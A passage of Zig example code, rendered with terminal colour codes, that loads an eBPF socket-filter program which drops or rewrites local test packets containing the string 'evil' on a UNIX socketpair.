�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mmap_lookup_elem�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m.{�[0m�[1m�[36m1�[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"BPF_map[1] = 0x{x}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m]});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mwrite�[0m�[1m�[37m(�[0m�[1m�[37msocks�[0m�[1m�[37m[�[0m�[1m�[36m1�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[33m"dontcare"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mmap_lookup_elem�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m.{�[0m�[1m�[36m1�[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"BPF_map[1] = 0x{x}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m]});�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33m// requires root/BPF privileges for BPF_PROG_TYPE_SK_SKB and looping�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mexample3�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37mprint�[0m�[1m�[37m(�[0m�[33m"---(BPF Example 3)---�[0m�[33m\n�[0m�[33m"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mmapfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mbpf_string_map�[0m�[1m�[37m(�[0m�[33m"evil"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr6�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mst�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// return if packet_len < 4 bytes�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mword�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr7�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mjmp�[0m�[1m�[37m(.�[0m�[1m�[37mjge�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr7�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m4�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m2�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mSK�[0m�[1m�[37m.�[0m�[1m�[37mPASS�[0m�[1m�[37m)),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// load "evil" into r9�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mld_map_fd1�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mmapfd�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mld_map_fd2�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mcall�[0m�[1m�[37m(.�[0m�[1m�[37mmap_lookup_elem�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mjmp�[0m�[1m�[37m(.�[0m�[1m�[37mjne�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m2�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mSK�[0m�[1m�[37m.�[0m�[1m�[37mDROP�[0m�[1m�[37m)),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr9�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// begin checking for "evil"�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr6�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x18�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr4�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m4�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mcall�[0m�[1m�[37m(.�[0m�[1m�[37mskb_load_bytes�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mjmp�[0m�[1m�[37m(.�[0m�[1m�[37mjlt�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// drop packet if it contains "evil"�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x18�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m4�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr9�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// .call(.strncmp),�[0m
�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mcode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mCALL�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mJMP�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdst�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msrc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37moff�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mimm�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m182�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mjmp�[0m�[1m�[37m(.�[0m�[1m�[37mjne�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m2�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mSK�[0m�[1m�[37m.�[0m�[1m�[37mDROP�[0m�[1m�[37m)),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mjmp�[0m�[1m�[37m(.�[0m�[1m�[37mjlt�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x200�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m17�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// replace start of packet with 'evil'�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr6�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr9�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr4�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m4�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr5�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mBPF_F_RECOMPUTE_CSUM�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mcall�[0m�[1m�[37m(.�[0m�[1m�[37mskb_store_bytes�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mSK�[0m�[1m�[37m.�[0m�[1m�[37mPASS�[0m�[1m�[37m)),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// verifier is a little too chatty due to the number of iterations�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mprogfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mprog_load�[0m�[1m�[37m(.�[0m�[1m�[37msk_skb�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37minsns�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"GPL v3"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37msockmapfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mmap_create�[0m�[1m�[37m(.�[0m�[1m�[37msockmap�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mattr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mAttr�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mprog_attach�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mtarget_fd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37msockmapfd�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mattach_bpf_fd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mprogfd�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mattach_type�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mAttachType�[0m�[1m�[37m.�[0m�[1m�[37msk_skb_stream_verdict�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mattach_flags�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mreplace_bpf_fd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mbpf�[0m�[1m�[37m(.�[0m�[1m�[37mprog_attach�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@constCast�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mattr�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mProgAttachAttr�[0m�[1m�[37m))))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCES�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mUnsafeProgram�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mFAULT�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mINVAL�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mInvalidProgram�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mPERM�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mPermissionDenied�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37msocks�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m2�[0m�[1m�[37m]�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37msocketpair�[0m�[1m�[37m(�[0m�[1m�[37mAF�[0m�[1m�[37m.�[0m�[1m�[37mUNIX�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mSOCK�[0m�[1m�[37m.�[0m�[1m�[37mDGRAM�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mSOCK�[0m�[1m�[37m.�[0m�[1m�[37mNONBLOCK�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37msocks�[0m�[1m�[37m)))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37me�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37me�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mmap_update_elem�[0m�[1m�[37m(�[0m�[1m�[37msockmapfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mtoBytes�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37msocks�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m]),�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mANY�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mpackets�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m][]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m"a"�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m"aaaa"�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m"imevil"�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
